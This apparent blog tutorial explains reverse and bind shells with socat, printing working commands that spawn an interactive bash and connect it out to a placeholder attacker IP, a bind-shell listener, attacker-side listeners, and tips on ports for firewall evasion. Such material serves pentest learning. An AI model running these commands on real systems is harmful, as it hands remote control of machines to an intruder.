Reverse Shell vs Bind Shell ft. Socat

Sundaram GSundaram G
3 min read

Analogy

Imagine two spies trying to communicate. One spy (attacker) waits at a safe house (port). The other spy (target) reaches out to initiate a secret chat - that’s a reverse shell. But if the safe house is locked and inaccessible, the first spy might knock on the other spy’s door instead - that’s a bind shell.

Now let’s understand how this works using Socat, the Swiss Army knife of networking tools.


What is Socat?

Socat (SOcket CAT) is a powerful command-line utility used to establish bidirectional data transfers between two data channels. Think of it as Netcat's smarter cousin. It can create encrypted connections, handle TTYs better, and forward between many protocols (TCP, UDP, UNIX sockets, etc.).


Netcat vs Socat

ToolNetcatSocat
PurposeSimple TCP/UDP data transferAdvanced data relay between endpoints
Protocol SupportTCP, UDPTCP, UDP, SSL, UNIX sockets, more
EncryptionNot supportedSSL/TLS supported
FlexibilityBasic one-linersHighly customizable setups
Ease of UseBeginner-friendlySteeper learning curve
Best ForQuick tests, basic reverse shellsTunneling, relays, secure connections

Reverse Shell with Socat

Target Command (sends shell to attacker):

socat EXEC:"bash -li",pty,stderr,setsid,sigint,sane TCP:<attacker-ip>:<port>

What this does:

  • EXEC:"bash -li": Launches an interactive login bash shell.

  • pty: Allocates a pseudo-terminal, making the shell behave properly.

  • stderr,setsid,sigint,sane: Ensures proper signal handling and clean I/O.

  • TCP:<attacker-ip>:<port>: Connects to the attacker’s IP and port.

Attacker Command (listen and forward to terminal):

socat TCP-L:<port> STDIO

Or better, for a real terminal interface:

socat TCP-L:<port> FILE:`tty`,raw,echo=0

Let’s breakdown the above command:

TCP-L:4444

  • This says: “Listen on TCP port 4444 (for example)”

  • When someone connects, receive data from them

  • This is your input stream

FILE:/dev/pts/X,raw,echo=0 (i.e., FILE:`tty` )

  • This is a file that represents your terminal (your screen + keyboard)

  • This is your output stream

  • Anything received over TCP will be written into this file (i.e., your terminal)

  • Anything you type goes into this file, and socat sends that to the TCP connection

This is the redirection:

  • Data from the TCP socket ←→ your terminal

  • socat copies data in both directions

Full I/O Redirection Explained - Flow:

  • TCP-L:4444 ← input from reverse shell

  • FILE:`tty` → sends that input into your terminal screen

  • Your keystrokes (in that terminal) go into /dev/pts/X and get sent back to the reverse shell via the TCP socket

Bind Shell with Socat

Target Command (starts a listener with shell):

socat TCP-L:<port>,reuseaddr,fork EXEC:"bash -li",pty,stderr,setsid,sigint,sane
  • TCP-L:<port>: Starts a listener on the target's machine.

  • reuseaddr,fork: Allows reuse of the port and handles multiple connections.

  • EXEC:"bash -li": Same — starts a bash shell.

  • pty,setsid: Ensures TTY allocation and session control.

Attacker Command (connects to target):

socat STDIO TCP:<target-ip>:<port>

Choosing the Right Port

  • Reverse Shell: Choose commonly allowed outbound ports like 443, 80, or 53 because most firewalls allow outgoing traffic on these.

  • Bind Shell: Choose ports less likely to be firewalled on the inbound side, but this is trickier. If a firewall blocks incoming traffic to unknown ports, bind shells won’t work well.

Reverse shells are more firewall-friendly in real-world scenarios.


TL;DR

FeatureReverse Shell (Socat)Bind Shell (Socat)
Initiated byTargetAttacker
Firewall BypassEasier (uses outbound connection)Harder (needs open inbound port on target)
StabilityVery stable with TTY, signals, etc.Stable with fork, pty, setsid options

Serious Note: Why did the hacker break up with Netcat?
Because Socat had better communication skills and actually listened on both ends. 😎

0
Subscribe to my newsletter

Read articles from Sundaram G directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Sundaram G
Sundaram G